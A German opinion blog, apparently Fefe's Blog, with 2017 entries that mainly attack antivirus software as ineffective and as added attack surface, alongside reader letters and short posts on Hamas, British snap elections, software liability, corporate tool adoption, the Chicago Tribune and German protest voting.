Kollateral-Schaden.
Wie oft hatten wir es bitte schon, dass ein Amok laufender Scanner von einem marodierenden Wozu-Testen-AV-Riesen schlicht Windows & co als Virus/Trojaner/Whatever eingestuft hat?
Gucken wir doch mal:
https://www.heise.de/-3693480
https://www.heise.de/-3120189
https://www.heise.de/-2638093
https://www.heise.de/-2573233
https://www.heise.de/-2465417
https://www.heise.de/-1822950
https://www.heise.de/-1440809
Das passt auch sehr schön dazu, welchen Testaufwand Microsoft im Vergleich betreibt.
Oh und was ist eigentlich mit Virenscannern, die Inhalte aus dem Netz nachladen, die nicht unbedingt... naja, gab es schließlich auch schon:
https://www.heise.de/-3237654
Soll man daraus schließen, dass die ihr eigenes Gift vmtl selbst gar nicht einsetzen?
Ach ja, ich vergaß, alles bedauerliche Einzelfälle vom Werksstudentenpraktikanten, die natürlich nie, nie, nie wieder passieren. Ungeachtet dessen, dass sie nie hätten passieren dürfen, das wäre eigentlich der Anspruch an diese Software.
So wie auch schon Schlangenöl auch nur in den besten Fällen keine Wirkung hatte.
Ich habe bisher auf diese Art von Linksammlung verzichtet, weil es mir gerade nicht darum geht, mit dem Finger auf einzelne Hersteller zu zeigen. Es gibt da sicher auch Pfusch bei einzelnen Anbietern, das sehe ich auch so, aber mir ist die fundamentale Kritik am Konzept des Antivirus wichtiger. Pfusch in Software gibt es ja leider häufiger.
Update: Ein anderer Einsender kommentiert:
Zum Thema Proaktive Komponente kann ich dir aus unserer Infrastruktur klar sagen: DAS ist das was am Meisten Fehlmeldungen produziert. Ich habe z.B. einen lang vergessenen Texteditor auf einer Netzwerkfreigabe rumliegen. Seit 2007. Und 2016 auf einmal meldet der Antivirus, dass das Ding verseucht ist und sofort desinfiziert werden muss. Ich warte zwei Tage (=zwei Signaturupdates) ab und lass den Ordner wieder scannen. Diesmal: Nix. Oder letzte Woche hat er uns 6 Userworkstations als virenverseucht gemeldet, weil die User Proxy PAC-Scripte im Browser konfiguriert haben. Ja, haben sie weil so unser Internetzugang funkioniert, aber ich frag mich ernsthaft warum der AV nur diese 6 Workstations gemeldet hat und nicht noch die anderen 400 die das AUCH haben. Tags drauf war wieder alles gut. Für mich als Admin ist das keine zusätzliche Sicherheitskomponente sondern nur zusätzliche Arbeit.
Und ich möchte auch zu der Cloud-AV-Sache noch mal klarstellen, wie sehr das Bullshit ist. Der CCC hat vor ein paar Jahren den Staatstrojaner veröffentlicht, ihr erinnert euch wahrscheinlich. Natürlich in einer entschärften Version, die keinen Schaden angerichtet hätte. Diese Version tauchte dann relativ zeitnah in den Cloud-Antivirus-Datenbanken auf. Die nicht entschärfte Version tauchte nicht auf. Nur falls sich da jemand Illusionen gemacht hat.
Update: Ein Biologe kommentiert:
Es gibt ja ein paar hübsche Analogien zwischen Computerviren und deren Verbreitung und der realen Welt. Beim Lesen des G-Data Pamphletes musste ich an einer Stelle herzlich lachen, als sie ihre "über 90% Erkennungsrate" beweihräucherten. Auf die Mikrobiologie übertragen ist das eine log1-Reduktion, also so knapp über Homöopathie und Gesundbeten. Ich arbeite mit Lebensmitteln, da darf man etwas "Debakterisierung" nennen, wenn man im log3-Bereich unterwegs ist. Also wenn 99.9% aller Keime gekillt werden. Pasteurisierung ist bei log5, also 99.999%. Und auch da wird die Milch nach 21 Tagen sauer.
90% ist da auf jeden Fall der Bereich "lohnt den Aufwand nicht". Da ist eine sinvolle Backup-Strategie und eine gewisse Routine im Rechner-wiederaufsetzen sinnvoller eingesetzt.
Update: Viele meiner Leser scheinen eine Statistik-Schwäche zu haben, und kommen mir hier mit Analogien wie "Kondome schützen ja auch nicht 100%" oder "im Flugzeugbau hat man auch nicht 100% als Anforderung". Vergegenwärtigt euch mal, wie viele Viren es gibt, und wie viele Malware-Angriffe pro Tag es auf typische Systeme gibt. Und dann rechnet euch mal aus, bei einer Erkennungsrate von 90%, oder sagen wir 99%, oder sogar 99.9%, wie viele Stunden es dauert, bis der Rechner infiziert ist. Ich habe in Köln und Hamburg das Publikum gefragt, wer schonmal Weihnachten einen Familien-PC säubern musste. Fast alle. Dann, bei wie vielen ein Antivirus drauf war. Jeweils einer weniger. EINER weniger. ALLE ANDEREN haben trotz Antiviren Malware eingefahren. Wir reden hier nicht von "ich habe dreimal pro Tag mit Kondom Sex und habe nie HIV gekriegt", sondern von über einer HIV-Infektion pro Tag. Und da, behaupte ich mal, wären auch die Nicht-Statistiker unter euch plötzlich mit der Kondom-Performance unzufrieden. Was ihr gerade am eigenen Leibe erlebt, das nennt man Rationalisierung. Ihr habt eine Entscheidung getroffen, nämlich einen Antivirus einzusetzen, und greift jetzt unterbewusst nach Strohhalmen, um das irgendwie zu rechtfertigen. Ich meine das gar nicht böse. So funktionieren Menschen. Euch kommt zugute, dass die meisten Viren bisher wenig kaputtgemacht haben. Vielleicht ein paar erotische Selfies exfiltriert, wenn es hochkommt an einem Botnet teilgenommen. Erst jetzt mit Ransomware werden Viren auch gefühlt richtig gefährlich. Ihr solltet nicht warten, bis euch das am eigenen Leib passiert.

Tue May 2 2017

[l] Zu der Hamas-Nummer gehen hier, wie zu erwarten, ein Haufen Kommentare ein. Ja, Hamas hat da was geschrieben, aber sie wollen den bewaffneten Kampf nicht aufgeben und sie erkennen Israels Existenzrecht nicht an. Und ich solle das bitteschön dazu sagen.
Nein. Das steht hinter dem Link. Daher ist da ein Link. Damit man da draufklickt.
Im Übrigen finde ich diese Reflexe faszinierend. Immer wenn die Palästinenser in irgendeinem Punkt Entgegenkommen zeigen, dann graben sich die Pro-Netanjahus tiefer ein und verweisen auf ihre Extremforderungen. Anstatt dass sie im Gegenzug von ihren Extremforderungen abweichen könnten!
Ich verstehe nicht, wieso Israel nicht an einer Lösung des Konfliktes interessiert zu sein scheint. Hamas steht hier offensichtlich unter Druck, sonst hätten sie dieses Papier ja nicht gemacht. Und man sieht, dass sie sich Sorgen machen, dass ihre Hardliner-Fraktion sich abspalten könnte, und bewaffneten Untergrundkrieg führen könnte, und damit Hamas bisschen internationles Standing als halbwegs legitim gewählte Regierung im Gazastreifen zerstören könnte. Das ist ein 1a Moment der Schwäche. Wieso nutzt Israel das nicht, um ein paar Fakten zu schaffen? Die könnten sich jetzt wunderbar als "wir nehmen jetzt mal eure Bullshit-Rhetorik nach außen für bare Münze" positionieren. Hamas bliebe gar nichts übrig, als zu ihren Worten zu stehen, ob die jetzt hohle Phrasen oder ernst gemeint waren.
Hamas ist offenbar gerade ehrlich daran interessiert, von Ägypten, der Uno und anderen Staaten als legitime Player wahrgenommen zu werden. Wieso nutzt das niemand?! Worauf warten die alle? Eine schriftliche Einladung?!
Ob man Hamas jetzt glaubt oder nicht, das ist eine Gelegenheit. Gelegenheiten muss man nutzen. Merkt Israel nicht, wie sich die öffentliche Wahrnehmung des Konfliktes in den letzten Jahrzehnten geändert hat?
Das ergibt für mich alles nicht viel Sinn gerade. Offensichtlich fehlen mir da ein paar der Fakten.
[l] Oh, huch? Theresa May scheint sich Sorgen zu machen, dass sie ihre Neuwahlen doch nicht mit großer Mehrheit gewinnen könnte.
Premierministerin Theresa May schwört nun die Briten ein: Wenn sie die Neuwahlen nicht gewinne, werde das Chaos regieren.
Das ist ja spannend! Ich dachte, das sei praktisch ausgemachte Sache, dass sie da die aktuelle Schwäche von Labour ausnutzt und sich festzementiert.

Wed Apr 26 2017

[l] Und jetzt noch eine ganz schlechte Laune machende Einsendung:
Hier ein Gedanke zum Vorschlag Software-Anbieter für den Schaden, der durch Sicherheitslücken entsteht haften zu lassen.
Das kann den Software Markt schnell in Richtung Oligopol Markt verändern.
Märkte mit hohen Haftungsrisiken, tendieren dazu große Firmen zu begünstigen und kleine zu verdrängen. Ich kann das hier in der Pharma-Industrie ganz gut sehen. Für die Luftfahrt-Industrie gilt aber das gleiche.
Haftung für komplexe Produkte und Prozesse führt nicht etwa nur zur Perfektion des Produktes, wie von Dir angenommen, sondern auch zur Abwehr der Haftung mittels Versicherung und Regulierung.
Stell Dir einfach mal vor, Du müsstest Software so anbieten wie die Pharma Industrie ihre Medikamente.
Es gäbe eine Aufsichtsbehörde, die festlegt, wer, mit welcher Bullshit-Zertifizierung, nach welchem Entwicklungsmodell, Software schreiben darf. Das ganze wird natürlich festgeschrieben und nur alle zehn Jahre aktualisiert.
Es gäbe regelmäßige Inspektionen, in denen Checklisten ausgefüllt würden ob nun dieses Merkmal guter Entwicklung oder jenes Sicherheits-Feature vorhanden und dokumentiert (!) ist.
Bisher kann jemand der fähig ist, eine Software-Firma aufmachen und ein Produkt verkaufen. Egal wie gut oder wie sicher. Ich behaupte, die meisten Kunden wissen das. Kaum einen stört das.
Sobald Du die Haftung z.B. per Gesetz einführst, bräuchten Software Firmen eine Versicherung (wer würde da sonst kaufen, wenn das Kapital der Firma nicht reicht um Schäden zu ersetzen?). Und sie brauchen tausend "qualitäts"-Zertifikate. Ist jetzt schon so, wenn die für Krankenhäuser oder eben die Pharma Industrie entwickeln wollen.
Helfen für Zertifikate? Nicht in deinem Sinne, dass die Software dann wirklich sicherer ist.
Der Nutzen liegt an anderer Stelle.
Ab einer gewissen Komplexität ist es für eine Firma oder auch für einen IT Sicherheits Experten nicht mehr möglich, sicherzustellen, dass kein Virus eingefangen wird / die Firma nicht gehackt wird.
Wenn beides nicht passiert, ist das reines Glück.
Was tut man also? Man tut das was branchen-üblich / gute Praxis ist und dokumentiert das!
Dafür gibt es IT Sicherheits Zertifikate, dafür kauft man Schlangenöl und man engagiert Pen-Tester.
Ein Pen-Test zeigt nicht nur, ob die Systeme hinreichend sicher sind, sondern er ist auch ein Signal, dass man etwas unternommen hat.
Für die Firmen, welche Software herstellen gilt das analog. IBM, SAP und Microsoft könnten immer darlegen, dass sie alles nach dem Schema der XY Zertifizierung entwickelt und getestet haben und dass es praktisch höhere Gewalt war wenn ihre Software Schaden angerichtet hat.
Die könnten auch den Papierkram stemmen um das alles zu dokumentieren.
Das Problem mit Haftung ist ja immer: es reicht nicht aus, gute Arbeit zu leisten. Man muss es auch dokumentieren… Und sich nach einem objektiven Standard richten… Wer setzt den?
Also überleg es Dir nochmal mit der Haftung für Schäden durch unsichere Software. ;)
Das ist in der Tat die Achillesferse bei dem Vorschlag mit der Produkthaftung. Fällt jemandem ein 3. Weg ein? Vielleicht wie in den USA, dass man sich dann halt dem Risiko von Millionenklagen aussetzt, selbst wenn man alles richtig gemacht hat? Ist auch nichts.

Tue Apr 25 2017

[l] So, ersten Veranstaltungstag überstanden.
Mein IoT-Vortrag schien ganz gut anzukommen, aber das Podium war zu lahm. Heise hatte kurzfristig ein Podium zur Frage "Sind Antiviren Schlangenöl?" eingeplant, nachdem ich da im Blog einen kleineren Schlagabtausch mit Heise Security hatte. Ich war ja erstmal überrascht, dass Heise Events es geschafft hat, für alle fünf Termine jemanden von der AV-Industrie zu finden, der sich da hinsetzt und das debattieren will. Die haben ja im Wesentlichen nichts zu gewinnen in einer Diskussion zu der Fragestellung. Aber sie haben es geschafft, und Hut ab vor den Leuten, die das jetzt machen.
Heute war das Ralf Benzmüller von G Data.
Weil das recht kurzfristig noch ins Programm gehievt wurde, und wir dann an dem Tag noch am Programm herumgeschoben haben, damit das nicht nur 30 Minuten sind wie ursprünglich eingeplant, und wir vorher auch keine Gelegenheit hatten, mal einen roten Faden zu klären, lief das Podium dann ein bisschen unrund, wie ich fand. Erstmal hat Heise vorher und nachher gefragt, wer meine These unterstützen würde, und wer die Gegenthese unterstützen würde, und ich konnte grob niemanden auf meine Seite ziehen, fing auch mit der klaren Minderheitsposition an. Das erwähne ich nur, um euch zu sagen, dass mich das nicht stört. Ich mache das nicht, "um zu gewinnen" oder so. Mich stört aber, dass wir teilweise aneinander vorbei geredet haben.
Ich habe extra versucht, da die technischen Details rauszuhalten, und auf einer ganz fundamentalen Ebene zu argumentieren.
Ich habe u.a. argumentiert, dass ein Virenscanner ja PDF-Dateien scannt, auch wenn ich gar keinen PDF-Viewer installiert habe. Dann wäre ich also ohne Antivirus sicher vor Angriffen via PDF gewesen, und erst durch den Antivirus kommt ein PDF-Parser ins Spiel, der wie jeder Parser-Code potentiell angreifbar ist. Ralf dachte, ich meinte, dass der mit den selben Exploits wie Acrobat angegriffen würde, und versuchte dann auszuführen, dass ein Antivirus ja die PDF-Datei gar nicht wirklich ausführt, sondern nach Heap Spraying und NOP Sleds sucht. Nicht nur verteidigte er damit einen Punkt, den ich nie kritisiert habe; im Publikum verstand das dann auch noch jemand so, als habe er eingeräumt, dass sie da nur oberflächlich ein bisschen draufschauen und das also gar nicht wirklich absichern.
Diese Art von Detail-Kleinkram wollte ich gerade vermeiden in der Debatte, denn da verliert man sich in irgendwelchen für die Diskussion und das Publikum unwichtigen Dingen.
Meine Aussage ist ja, kurz zusammengefasst, folgende:
- Antiviren funktionieren nicht. Diesen Punkt illustriere ich damit, dass man zu Weihnachten gerne mal in der Famlie zu PC-Aufräum-Diensten herangezogen wird als ITler, und auf dem PC war dann natürlich ein Antivirus installiert. Denn PCs ohne Antivirus gibt es ja kaum noch. Oder Fälle von Ransomware in der Bekanntschaft, die hatten wahrscheinlich auch alle einen Antivirus installiert.
- Antiviren schaffen zusätzliche Angriffsoberfläche. Das wollte ich mit dem PDF-Beispiel illustrieren, das dann wie oben beschrieben entglitt.
In meinem rationalen Universum ist mit diesen beiden Punkten alles gesagt. Funktioniert nicht und verursacht Folgeprobleme? Will man nicht!
Und für den Fall, dass die "ist ja bloß ein Grundschutz"-Ausflucht kommt, vielleicht noch garniert mit "100% Sicherheit gibt es gar nicht", hatte ich mir überlegt, wie das wäre, wenn man eine Putzkraft einstellt, und die hinterlässt dann in der Küche einen großen Schmutzfleck, und argumentiert dann: Ist ja nur eine Grundreinigung, der Flur ist aber voll sauber jetzt!
Wieso würde man bei einer Putzkraft höhere Standards anlegen als bei einem Antivirus? Erschließt sich mir nicht.
Aber es stellt sich raus, und das muss ich völlig emotionslos hinnehmen, dass die Leute da draußen wissen, dass Antiviren nichts bringen, potentiell die Dinge schlimmer machen, Geld kosten, und die Werbeversprechen der Hersteller zum Gutteil falsch sind — und das trotzdem für einen nicht nur akzeptablen sondern notwendigen Deal hält.
Ich vermute, dass es da einen bisher unerkannten psychologischen Hintergrund gibt. Meine Vermutung ist, dass das unser Ablassschein dafür ist, dass wir lauter Software einsetzen, der wir nicht vertrauen, und von der wir aus Erfahrung wissen, dass sie unsicher ist. Wir setzen die trotzdem ein, uns müssen diesen offensichtlichen Fehler irgendwie wegrationalisieren. Dafür kaufen wir uns beim Schlangenöllieferanten einen Ablassschein. Dem können wir zwar auch nicht vertrauen, aber das war ja auch nicht der Punkt an der Sache. Den Antivirus kauft man nicht, damit er einen absichert, sondern damit man sagen kann, man habe aber einen Antivirus gehabt.
Ich frage mich, ob man da nicht viel Aufwand sparen kann, und den Leuten das Geld abnimmt, aber ohne einen Antivirus zu liefern. Sankt Fefes Schlangenöl-Ablassbrief. Du setzt Internet Explorer ein? Sag drei Ave Maria und kaufe vier Sankt Fefe Schlangenöl-Ablasszertifikate!
Als Gegenleistung könnte man so richtig schöne Zertifikate drucken. Auf gutem Papier, ihr wisst schon. Wasserzeichen, Prägung, vielleicht noch ein Wachssiegel.
Sollte ich mal vorbereiten und bei solchen Gelegenheiten verkaufen. Aufschrift: Dem Eigentümer dieses Zertifikates wird verziehen, dass er immer noch Firefox einsetzt, obwohl er wusste, was da mit jedem einzelnen Release für unfassbar furchtbare Sicherheitslücken zugemacht werden müssen, und dass es keinen Grund für die Annahme gibt, dass diese Reihe nicht so weitergehen wird. Gezeichnet: Kardinal Rieger.
Auf der anderen Seite kann es natürlich sein, dass so ein Podium gar nicht funktionieren kann, denn es war ja gar nicht mein Ziel, da irgendeinen bestimmten Hersteller rauszuziehen und schlecht zu machen, schon gar nicht den, der sich neben mir aufs Podium getraut hat. Es ist auch nicht mein Ziel, dazu aufzurufen, dass die Leute alle ihre Antiviren deinstallieren. Wir sind hier alle Erwachsene. Wer auf selbstzugefügte Schmerzen steht, dem werde ich da keine Vorschriften zu machen versuchen. Und häufig haben gerade Firmen sowas ja auch aus Compliance-Gründen oder weil sonst die Versicherung im Schadensfall nicht zahlt.
Naja, und so kam am Ende völlig überraschend raus, dass die Fakten völlig unstrittig sind. Wir legen sie bloß fundamental verschieden aus.
Update: Der Vollständigkeit halber: 100% Sicherheit gibt es natürlich doch. Jemand, der keine PDF-Software installiert hat, ist 100% sicher vor PDF-Exploits. Bis er einen Antivirus installiert. Dann nicht mehr.
Update: Ich werde häufig gefragt, was denn mein Vorschlag gegen Malware ist. Hier ist meine Antwort.
Die Malware-Problematik besteht aus zwei zu trennenden Hälften. Erstens Malware, die unter Ausnutzung von Sicherheitslücken auf das System kommt. Zweitens Malware, die völlig legitim auf das System kommt, beispielsweise in einer E-Mail, und die dann vom Benutzer ausgeführt wird.
Die erste Kategorie von Malware kriegt man weg, indem man Softwarehersteller für Schäden in Haftung nimmt, die aus ihren Sicherheitslücken resultieren. Die zweite Kategorie von Malware kriegt man weg, indem man das Modell von Mobiltelefonen übernimmt. Anwendungen laufen nicht mehr in einem großen Universum gleichberechtigt nebeneinander und haben alle vollen Zugriff auf alle Ressourcen, auf die der User Zugriff hat, sondern Anwendungen laufen jeweils in einer Sandbox mit minimalen Rechten, und wenn sie eine Datei öffnen wollen, können sie nur das System bitten, einen "Datei öffnen"-Dialog anzuzeigen. Dateien einfach so mit Dateinamen öffnen oder ohne Rückfrage geht nicht. So ein Modell hat Microsoft mit ihrem App Store zu etablieren versucht, und der Markt hat sie ausgelacht und das nicht haben wollen. Dafür installieren wir uns dann einen Antivirus drüber. Um unser schlechtes Gewissen zu beruhigen.
Update: Hier kommt der Einwand, dass das ja noch dauert, bis wir Produkthaftung kriegen. Das ist also jetzt keine akute Lösung!1!! Ja, und? Gegen 0days zu helfen sagen ja auch Antiviren nicht zu. Und wenn es kein 0day ist, muss man halt immer schön alles gepatcht halten. Dann kann einem die auf Sicherheitslücken basierende Malware auch nichts. Für mich ist das der Gipfel der Unverantwortlichkeit, wenn Konzerne sich ganze Abteilungen mit Bremsklötzen leisten, die dann vorgeblich Patches "prüfen", ob die wirklich ausgerollt werden müssen oder nicht. Und in der Praxis führen die nur dazu, dass steinalte Exploits in dem Laden noch funktionieren. Aber hey, dafür haben wir ja Antiviren installiert!1!!
Und nicht auf Sicherheitslücken basierende Malware kriegt man im Firmenumfeld dadurch weg, dass man den Leuten keinen lokalen Adminzugang gibt und sie nur Programme von der Whitelist ausführen lässt. Ich glaube ja, dass das mit der Tooldiskussion neulich hier im Blog Hand in Hand geht. Firmen tolerieren ein geradezu groteskes Maß an Unwissen und Lernverweigerung. Und die Mitarbeiter nehmen das dankend an, weil sie dann die Unschuld vom Lande geben können. "Ja aber ich hab doch bloß auf das Bild geklickt und die drei Warnfenster sofort ungelesen zugemacht!1!!"

Sat Apr 22 2017

[l] Ist hier jemand im Software Development-Bereich aktiv?
Dann schlage ich vor, kurz dieses Essay über Hype Driven Development zu lesen. Das ist der Kategorienbegriff.
Ich finde es auffällig, wie häufig in Projekten erst das zu verwendende Werkzeug festgelegt wird, dann was damit gemacht werden soll. Es gibt Argumente für die Vorgehensweise, beispielsweise wenn das Ziel der Übung ist, dass man jemanden mit einem bestimmten Tool trainiert, damit er danach damit umgehen kann. Also gibt man ihm ein-zwei Spielprojekte mit dem Tool. OK, dagegen sage ich nichts.
Was ich jetzt meine sind so Sachen wie: "Wir schaffen hier mal den IBM Virtual Mainframe Distributed Cloud Blockchain Orchestrator an!!1!", dann wird das gekauft, und nicht nur weiß keiner, wozu das gut ist, oder wie man es bedient, es ist auch kein Geld für Schulungen eingeplant (die Geschäftsführung hat gehört oder findet, dass Learning by Doing reicht, das eignet man sich schon im Vorbeigehen an). Und wenn sich die Erkenntnis der eigenen Unmündigkeit herumgesprochen hat, dann kauft man schnell externe Experten ein, die das einrichten.
Ich verstehe das ja, wenn man mal einen Fehler macht. Aber das ist so sinnlos und selbst zugefügt! Wieso passiert das immer wieder?
Vor allem ist der nächste Schritt dann, wenn das erste Wundertool nie seinen Zweck erfüllt hat, dass man ein anderes Wundertool kauft, nach dem selben Verfahren und mit dem selben Ergebnis.
[l] The Intercept hat einen Podcast mit Julian Assange gemacht und ein volles Transkript davon online gestellt.

Wed Apr 19 2017

[l] Ich muss hier mal kurz was loswerden, das mich gerade bedrückt.
Ich komme ja beruflich rum und habe mit verschiedenen Firmen und Konzernen zu tun. Es gibt da eine Sache, die ich häufiger beobachten kann (nicht immer!).
Stellt euch mal jemanden vor, der in einer Firma Post austrägt. Doofes Beispiel, doofe Analogie, aber macht mal kurz mit.
So, der kommt morgens immer zur Poststelle, greift sich mit beiden Händen Briefe, und trägt die dann in der Firma rum zu den einzelnen Gebäuden oder Mitarbeitern.
So, jetzt stellt euch mal vor, dass die Firma dem einen Sack kauft. Hier, Postausträger, du musst die Briefe jetzt nicht mehr mit deinen Händen tragen, tu sie in diesen Sack. Dann werden die auch nicht nass, wenn es regnet und du ins andere Gebäude musst.
Und jetzt stellt euch mal vor, dass der Austräger ablehnt. Nee, Sack braucht er nicht. Er kann das auch so, vielen Dank.
Ja, aber du könntest damit deine Produktivität steigern! Mehr Post in weniger Zeit austragen! Schau mal hier, wir können dir die Post auch vorsortieren, dann hast du einen Sack für Gebäude A und einen für Gebäude B!
Ja, nee, will ich nicht, ich mach das so wie ich es gelernt habe.
Das ist jetzt ein plakatives Beispiel, aber diese Art von … ja was? Starrsinnigkeit? … erlebe ich häufiger in Firmen, besonders in großen Firmen. Die Firma schafft irgendwelche Produkte an, die irgendwas besser machen sollen, und dann nimmt sich niemand in der Firma die Zeit, sich in den Scheiß mal einzuarbeiten! Das Produkt steht dann da rum, oder manchmal nimmt man auch einen externen Dienstleister, der das irgendwo einbaut. Dann hat das Ding Strom und Netz und es gibt einen Mitarbeiter, der guckt, ob das noch an ist.
Aber das Gerät hilft dann nicht, sondern es wird nur verwaltet. Mit den anderen Geräten, die auch nicht helfen. Und am Ende gibt es eine Landschaft voller Ruinen, die alle verwaltet werden, und die Firma kauft vielleicht noch eine weitere zukünftige Ruine für die Verwaltung der anderen Ruinen. Vielleicht gleich alles doppelt angeschafft, wegen der Ausfallsicherheit.
Aber am Ende des Tages laufen die Leute da mit Bleigewichten an ihren Füßen herum, weil sie so viel unnützen Mist verwalten müssen, der eigentlich überhaupt nicht gebraucht wird.
Aber das ist gar nicht der Punkt, der mich bedrückt, dass sich da so viel Mist akkumuliert. Was mich bedrückt, ist: Wenn du in der Abteilung für $FOO arbeitest, und die Firma schafft das Marktführer-Tool für $FOO an, und du kannst es nicht bedienen … hättest du dann nicht das Bedürfnis, das zu lernen? Ich meine, das wäre für die Firma besser, wenn das jemand bedienen kann. Du bist in der Abteilung, in der man wissen sollte, wie man das Marktführer-Tool für den Bereich bedient. Es würde deinen Wert auf dem Arbeitsmarkt und für die Firma steigern, wenn du wüsstest, wie man das bedient.
Und dennoch … das höchste der Gefühle ist, dass so Basisfunktionalität in Betrieb genommen wird. Bei einer Firewall werden ein paar Regel gesetzt, vielleicht. Ein Logging-Server wird mit Logs beschickt. Mit einem Backup-Server werden vielleicht ein paar Backups gemacht. Aber das ist auch alles. Benachrichtigung im Problemfall? Beim Backup auch gucken, ob Restore geht? Bei der Firewall gucken, dass kein Kollege unegal am Regelset herumspielt? Das ist sowas von die Ausnahme, dass man regelmäßig bei Enterprise-Tools Produkt-brechende Bugs in der fundamentalsten Basisfunktionalität hat. Und wenn man den Support fragt, wie so ein Bug es bis zum Kunden schaffen kann, sagen sie: Die Option hat wohl vor Ihnen noch keiner genutzt. Oh tatsächlich? Noch niemand vor mir hat das Suchfeld benutzt?!
Mit Nichtwissen kann ich leben. Da bin ich auch niemandem böse. Solange man das erkennt, das man keine Ahnung hat, ist das OK. Aber dann bitte auch Gelegenheiten zur Wissensmehrung wahrnehmen! WTF?! Wie kommt das, hat jemand eine Erklärung? Das sind übrigens nicht bloß ältere Mitarbeiter, die dieses Muster zeigen. Im Gegenteil, auch viele Jüngere!
Update: Oh und das betrifft ja auch nicht nur so Enterprise-Apps. Nehmt nur mal Windows und MS Office. Muss man nicht mögen, aber wenn man damit tagtäglich Briefe schreiben muss, dann setzt man sich dochmal damit auseinander, dass man Text auch mit Shift-Ctrl-Pfeiltasten wortweise markieren und mit Ctrl-B fett setzen kann, und da nicht mit der Maus herumkrautern muss. Aber was man da teilweise bei Fachkräften sieht, das irritiert mich jedes Mal. Gut, ich hab auch keine Lust auf MS Office, und mache lieber XeLaTeX oder Webseiten, wenn ich eine Wahl habe. Aber wenn man sich schon mit so einer Software herumschlagen muss, dann guckt man doch, wie man sich die Schmerzen reduzieren kann!?
[l] Wollt ihr mal was echt Trauriges lesen?
Dann lest euch mal diesen Artikel hier durch, geschrieben von einem Mitarbeiter bei der Chicago Tribune. Der Name sagt einem Europäer vielleicht nichts, aber das ist eine traditionsreiche, überregional bedeutsame Tageszeitung aus Chicago, die auf eine lange Geschichte zurückblickt. Ich zitiere mal:
One of the great scoops in Tribune history came when it obtained the text of the Treaty of Versailles in June 1919. Another was its revelation of United States war plans on the eve of the Pearl Harbor attack. The Tribune's June 7, 1942, front page announcement that America had broken Japans naval code was actually the potential revelation of a closely guarded military secret by the paper. […] In early 1974, in a major feat of journalism, the Tribune published the complete 246,000-word text of the Watergate tapes in a 44-page supplement that hit the streets a mere 24 hours after the transcripts' release by the Nixon White House. Not only was the Tribune the first newspaper to publish the transcripts, but it beat the Government Printing Office's own published version, and made headlines doing so.
Sehr tragisch also, dass dieses Blatt dann 2007 von einem Immobilienmagnaten gekauft wurde und 2008 Gläubigerschutz anmelden musste. Nachdem der Immobilienmagnat dann eine Korruptionsermittlung losgetreten hat, in der auch der Gouverneur von Illinois verstrickt war, verließ sie 2013 den Gläubigerschutz und gehört jetzt irgendwelchen Geier-Kapitalisten, die anderer Leute Schulden zu Spekulationszwecken billigst aufkaufen. Das vorläufige Ende der Saga war dann 2016, als sich die Tribune Publishing Company zu "tronc" umbenannte und offen ansagte, dass sie jetzt im "content curation and monetization"-Bereich tätig sei, was ich mal als "wir sind eine Content Mill" deute.
So, nach all dem Kontext, lest euch mal den Link oben durch. Da fällt dem Mitarbeiter auf, dass Facebook ihren Content plötzlich nur noch partiell weiterleitet.
Man kann jetzt gehässig sein, und sagen: Hättet ihr Deppen euch mal nicht von Facebook abhängig gemacht. Aber das hilft ja auch nicht. Das ist Journalismus im Jahre 2017. Achtet mal darauf, wie der im unteren Bereich die Optionen durchgeht, die sie anscheinend mal durchüberlegt haben. Sehr, SEHR gruselig.

Tue Apr 18 2017

[l] Theresa May pullt einen Schröder und stellt die Vertrauensfrage, äh, nein, Sekunde, ruft vorgezogene Neuwahlen am 8. Juni aus.
Sie würde aber schon gerne den Eindruck vermeiden, sie stünde mit dem Rücken zur Wand, und hat die Ansage auch extra draußen an der frischen Luft gemacht, damit man den Verzweiflungsgeruch nicht so stark riecht.
[l] Leserbriefe zum Türkei-Referendum:
Es gibt keine Protestwähler. Die Menschen setzen ihr Kreuz auf dem Stimmzettel zu der Partei, hinter deren (populistischen) Positionen sie mehrheitlich stehen. Der Protestwähler ist eine Erfindung der Medien. Das "Protestwählertum" ist eine Erfindung der Journalisten, die arrogant genug sind, den Wähler für dumm, oder besser gesagt, uninformiert zu halten. Wir müssen damit leben, dass wir rechte Mehrheiten in unserer Republik haben.
Das glaube ich so nicht, u.a. wegen des nächsten Leserbriefes:
Ich bin einer der von dir so titulierten "ich wollte nur mal einen Denkzettel erteilen"-Idioten, der in der nächsten Wahl die AFD wählen wird.
Nicht weil ich die gut finde. Sondern weil es meine Unzufriedenheit so ausdrückt, dass es dem politischen System wehtut.
Ich bin 47 Jahre alt, wohne im Münchner Speckgürtel und bezeichne mich eigentlich Zeit meines Lebens als politisch interessiert und Grün bis Linksalternativ. Meine in den letzten 30 Jahren abgegebenen Parteistimmen gingen überwiegend an Grüne, Linke und Piraten. Ich habe fast alle Kommunal/Landtags/Bundestagswahlen und Bürgentscheide mitgemacht. Ich habe in Wackersdorf demonstriert, für den Frieden und gegen G20-Treffen, aus Überzeugung und ich finde das noch immer richtig.
Die letzte Bundestagswahl habe ich bewusst ungültig gewählt (mit einem Kommentar auf dem Stimmzettel wird die Stimme ungültig) - was eigentlich die Königslösung für alle wäre, aber keiner tuts halt.
Soll ich dir was sagen? - Ich finde die AFD Scheisse und ich finde die Köpfe der AFD zum Kotzen. Aber noch viel mehr kotzt mich an, was unter den Augen und mit dem Segen der etablierten Politik, der Sozen, der CxU und der Grünen aus diesem Land und den Menschen geworden ist.
Damit wir uns richtig verstehen: Ich komme aus einfachen Verhältnissen, aber ich bin auf der Sonnenseite: Ich habe Familie, gesunde Kinder, Wohneigentum. Ich verdiene Sechssstellig, ohne mir zuviele Beine auszureissen. Ich neide niemanden etwas, den Hartzern nicht, den Vermögenden nicht und auch den Flüchtlingen nicht. Ich fände ein Bedingungsloses Grundeinkommen eine feine Sache und ich habe kein Problem mit Flüchtlingen, die herkommen, um zu lernen und zu arbeiten (wenn sie denn dürften). Ich lebe gern.
Ich habe ein Problem mit der Tochter meiner Nachbarin: Die ist Bäckereiverkäuferin und kommt trotz achtstundenjob mit dem lächerlich wenigen Geld nicht über die Runden. Ich habe ein Problem mit Millionen Arbeitern, denen es genauso geht, weil seit Jahren die Reallöhne gekürzt werden, während die soziale und die monetäre Schere zwischen Arm und Reich, zwischen Stadt und Land, zwischen Bildung und Prekariat immer weiter aufgeht. Ich habe ein Problem mit einer verlogenen und unfähigen Regierung, die die Digitalisierung komplett verschläft und sich von der Wirtschaft immer mehr kaufen lässt.
